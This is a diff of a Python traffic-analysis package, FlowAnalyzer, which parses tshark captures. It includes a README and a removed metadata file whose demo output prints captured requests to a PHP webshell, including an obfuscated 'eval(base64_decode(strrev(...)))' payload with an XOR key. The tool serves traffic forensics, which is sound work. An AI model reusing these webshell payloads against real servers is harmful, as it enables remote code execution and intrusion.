序号: 8请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1427', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTL1ACWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOSdqCqaPC9ZW7GI7C2kIPd0MqlXzqT3svOl%2B1gNW3x0TL4%2BUQ0cdgeygrWzt1XSzu7opY93Nvl1tILnOWMx', 时间: 1682596308.573707
|
|
76
|
+
序号: 9请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:48 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'50\r\n72a9c691ccdaab98fL1tMGI4YTljMn75e3jORcmaTQZQeEdS2jE3TKPMeDNjNg==b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596308.582312
|
|
77
|
+
```
|
|
78
|
+
|
|
79
|
+
# Contributing
|
|
80
|
+
Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
|
|
81
|
+
|
|
82
|
+
# License
|
|
83
|
+
|
|
84
|
+
This project is licensed under the [MIT License.](LICENSE)
|
|
@@ -7,7 +7,7 @@ with open(os.path.join(os.path.dirname(__file__), "README.md"), encoding="utf-8"
|
|
|
7
7
|
|
|
8
8
|
setup(
|
|
9
9
|
name="FlowAnalyzer",
|
|
10
|
-
version="0.2
|
|
10
|
+
version="0.3.2",
|
|
11
11
|
description="FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件",
|
|
12
12
|
author="Byxs20",
|
|
13
13
|
author_email="97766819@qq.com",
|
|
@@ -1,85 +0,0 @@
|
|
|
1
|
-
Metadata-Version: 2.1
|
|
2
|
-
Name: FlowAnalyzer
|
|
3
|
-
Version: 0.2.9
|
|
4
|
-
Summary: FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件
|
|
5
|
-
Home-page: https://github.com/Byxs20/FlowAnalyzer
|
|
6
|
-
Author: Byxs20
|
|
7
|
-
Author-email: 97766819@qq.com
|
|
8
|
-
License: UNKNOWN
|
|
9
|
-
Description: # FlowAnalyzer
|
|
10
|
-
|
|
11
|
-
# Installation
|
|
12
|
-
|
|
13
|
-
Install the package using pip:
|
|
14
|
-
|
|
15
|
-
```
|
|
16
|
-
pip3 install FlowAnalyzer
|
|
17
|
-
```
|
|
18
|
-
|
|
19
|
-
```
|
|
20
|
-
pip3 install FlowAnalyzer -i https://pypi.org/simple
|
|
21
|
-
```
|
|
22
|
-
|
|
23
|
-
# Usage
|
|
24
|
-
|
|
25
|
-
请务必添加 `tshark.exe` 到环境变量,否则找不到会出错!
|
|
26
|
-
|
|
27
|
-
```
|
|
28
|
-
$ git clone https://github.com/Byxs20/FlowAnalyzer.git
|
|
29
|
-
$ cd ./FlowAnalyzer/
|
|
30
|
-
```
|
|
31
|
-
|
|
32
|
-
```python
|
|
33
|
-
# sourcery skip: use-fstring-for-formatting
|
|
34
|
-
import os
|
|
35
|
-
from FlowAnalyzer import FlowAnalyzer
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
baseDir = os.path.dirname(os.path.abspath(__file__))
|
|
39
|
-
flowPath = os.path.join(baseDir, "flow.pcapng")
|
|
40
|
-
display_filter = "(http.request and urlencoded-form) or (http.request and data-text-lines) or (http.request and mime_multipart) or (http.response.code == 200 and data-text-lines)"
|
|
41
|
-
|
|
42
|
-
jsonPath = FlowAnalyzer.get_json_data(flowPath, display_filter=display_filter)
|
|
43
|
-
for count, http in enumerate(FlowAnalyzer(jsonPath).generate_http_dict_pairs(), start=1):
|
|
44
|
-
print(f"[+] 正在处理第{count}个HTTP流!")
|
|
45
|
-
|
|
46
|
-
request, response = http.request, http.response
|
|
47
|
-
if request:
|
|
48
|
-
request_num, header, file_data, time_epoch = request.frame_num, request.header, request.file_data, request.time_epoch
|
|
49
|
-
print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(request_num, header, file_data, time_epoch))
|
|
50
|
-
|
|
51
|
-
if response:
|
|
52
|
-
response_num, header, file_data, time_epoch = response.frame_num, response.header, response.file_data, response.time_epoch
|
|
53
|
-
print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(response_num, header, file_data, time_epoch))
|
|
54
|
-
```
|
|
55
|
-
|
|
56
|
-
```
|
|
57
|
-
$ python3 .\tests\demo.py
|
|
58
|
-
[+] 正在处理第1个HTTP流!
|
|
59
|
-
序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1403', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%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%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1YCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOQNpHlpcBNa5IHIHHrIHEy7jch%2Fv3Z2Y0lq8qSQQkYhwWZhxVpNq1liOGE%3D', 时间: 1682596262.982344
|
|
60
|
-
序号: 3请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:02 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'70\r\n72a9c691ccdaab98fL1tMGI4YTljMh76GrwuHij67J+qF+t2KR17BwHlSvtL1mdSPnoksIZRS0N0Xi89+zNlNaUo+3xjMTU=b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596262.992406
|
|
61
|
-
[+] 正在处理第2个HTTP流!
|
|
62
|
-
序号: 5请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1409', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%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%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1cCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOTReMrqj%2Fx6aH4XU%2BWInBcrzUhN6o%2FMfL54MmpIY6avwUcSIJBkZUuq7rVUYzE1', 时间: 1682596266.652869
|
|
63
|
-
序号: 6请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:06 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'40\r\n72a9c691ccdaab98fL1tMGI4YTljMh4dHdNjM6AJ3DZmOGE5b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596266.661427
|
|
64
|
-
[+] 正在处理第3个HTTP流!
|
|
65
|
-
序号: 8请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1427', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%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%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTL1ACWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOSdqCqaPC9ZW7GI7C2kIPd0MqlXzqT3svOl%2B1gNW3x0TL4%2BUQ0cdgeygrWzt1XSzu7opY93Nvl1tILnOWMx', 时间: 1682596308.573707
|
|
66
|
-
序号: 9请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:48 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'50\r\n72a9c691ccdaab98fL1tMGI4YTljMn75e3jORcmaTQZQeEdS2jE3TKPMeDNjNg==b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596308.582312
|
|
67
|
-
```
|
|
68
|
-
|
|
69
|
-
# Contributing
|
|
70
|
-
Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
|
|
71
|
-
|
|
72
|
-
# License
|
|
73
|
-
|
|
74
|
-
This project is licensed under the [MIT License.](LICENSE)
|
|
75
|
-
|
|
76
|
-
Platform: UNKNOWN
|
|
77
|
-
Classifier: Development Status :: 3 - Alpha
|
|
78
|
-
Classifier: Intended Audience :: Developers
|
|
79
|
-
Classifier: License :: OSI Approved :: MIT License
|
|
80
|
-
Classifier: Programming Language :: Python :: 3
|
|
81
|
-
Classifier: Programming Language :: Python :: 3.6
|
|
82
|
-
Classifier: Programming Language :: Python :: 3.7
|
|
83
|
-
Classifier: Programming Language :: Python :: 3.8
|
|
84
|
-
Classifier: Programming Language :: Python :: 3.9
|
|
85
|
-
Description-Content-Type: text/markdown
|
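--- a/FlowAnalyzer-0.2.9/PKG-INFO
+++ /dev/null
@@ -1,85 +0,0 @@
-Metadata-Version: 2.1
-Name: FlowAnalyzer
-Version: 0.2.9
-Summary: FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件
-Home-page: https://github.com/Byxs20/FlowAnalyzer
-Author: Byxs20
-Author-email: 97766819@qq.com
-License: UNKNOWN
-Description: # FlowAnalyzer
-
-# Installation
-
-Install the package using pip:
-
-```
-pip3 install FlowAnalyzer
-```
-
-```
-pip3 install FlowAnalyzer -i https://pypi.org/simple
-```
-
-# Usage
-
-请务必添加 `tshark.exe` 到环境变量,否则找不到会出错!
-
-```
-$ git clone https://github.com/Byxs20/FlowAnalyzer.git
-$ cd ./FlowAnalyzer/
-```
-
-```python
-# sourcery skip: use-fstring-for-formatting
-import os
-from FlowAnalyzer import FlowAnalyzer
-
-
-baseDir = os.path.dirname(os.path.abspath(__file__))
-flowPath = os.path.join(baseDir, "flow.pcapng")
-display_filter = "(http.request and urlencoded-form) or (http.request and data-text-lines) or (http.request and mime_multipart) or (http.response.code == 200 and data-text-lines)"
-
-jsonPath = FlowAnalyzer.get_json_data(flowPath, display_filter=display_filter)
-for count, http in enumerate(FlowAnalyzer(jsonPath).generate_http_dict_pairs(), start=1):
-print(f"[+] 正在处理第{count}个HTTP流!")
-
-request, response = http.request, http.response
-if request:
-request_num, header, file_data, time_epoch = request.frame_num, request.header, request.file_data, request.time_epoch
-print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(request_num, header, file_data, time_epoch))
-
-if response:
-response_num, header, file_data, time_epoch = response.frame_num, response.header, response.file_data, response.time_epoch
-print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(response_num, header, file_data, time_epoch))
-```
-
-```
-$ python3 .\tests\demo.py
-[+] 正在处理第1个HTTP流!
-序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1403', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%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%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1YCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOQNpHlpcBNa5IHIHHrIHEy7jch%2Fv3Z2Y0lq8qSQQkYhwWZhxVpNq1liOGE%3D', 时间: 1682596262.982344
-序号: 3请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:02 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'70\r\n72a9c691ccdaab98fL1tMGI4YTljMh76GrwuHij67J+qF+t2KR17BwHlSvtL1mdSPnoksIZRS0N0Xi89+zNlNaUo+3xjMTU=b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596262.992406
-[+] 正在处理第2个HTTP流!
-序号: 5请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1409', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%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%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1cCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOTReMrqj%2Fx6aH4XU%2BWInBcrzUhN6o%2FMfL54MmpIY6avwUcSIJBkZUuq7rVUYzE1', 时间: 1682596266.652869
-序号: 6请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:06 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'40\r\n72a9c691ccdaab98fL1tMGI4YTljMh4dHdNjM6AJ3DZmOGE5b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596266.661427
-[+] 正在处理第3个HTTP流!
-序号: 8请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1427', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%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%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTL1ACWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOSdqCqaPC9ZW7GI7C2kIPd0MqlXzqT3svOl%2B1gNW3x0TL4%2BUQ0cdgeygrWzt1XSzu7opY93Nvl1tILnOWMx', 时间: 1682596308.573707
-序号: 9请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:48 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'50\r\n72a9c691ccdaab98fL1tMGI4YTljMn75e3jORcmaTQZQeEdS2jE3TKPMeDNjNg==b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596308.582312
-```
-
-# Contributing
-Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
-
-# License
-
-This project is licensed under the [MIT License.](LICENSE)
-
-Platform: UNKNOWN
-Classifier: Development Status :: 3 - Alpha
-Classifier: Intended Audience :: Developers
-Classifier: License :: OSI Approved :: MIT License
-Classifier: Programming Language :: Python :: 3
-Classifier: Programming Language :: Python :: 3.6
-Classifier: Programming Language :: Python :: 3.7
-Classifier: Programming Language :: Python :: 3.8
-Classifier: Programming Language :: Python :: 3.9
-Description-Content-Type: text/markdown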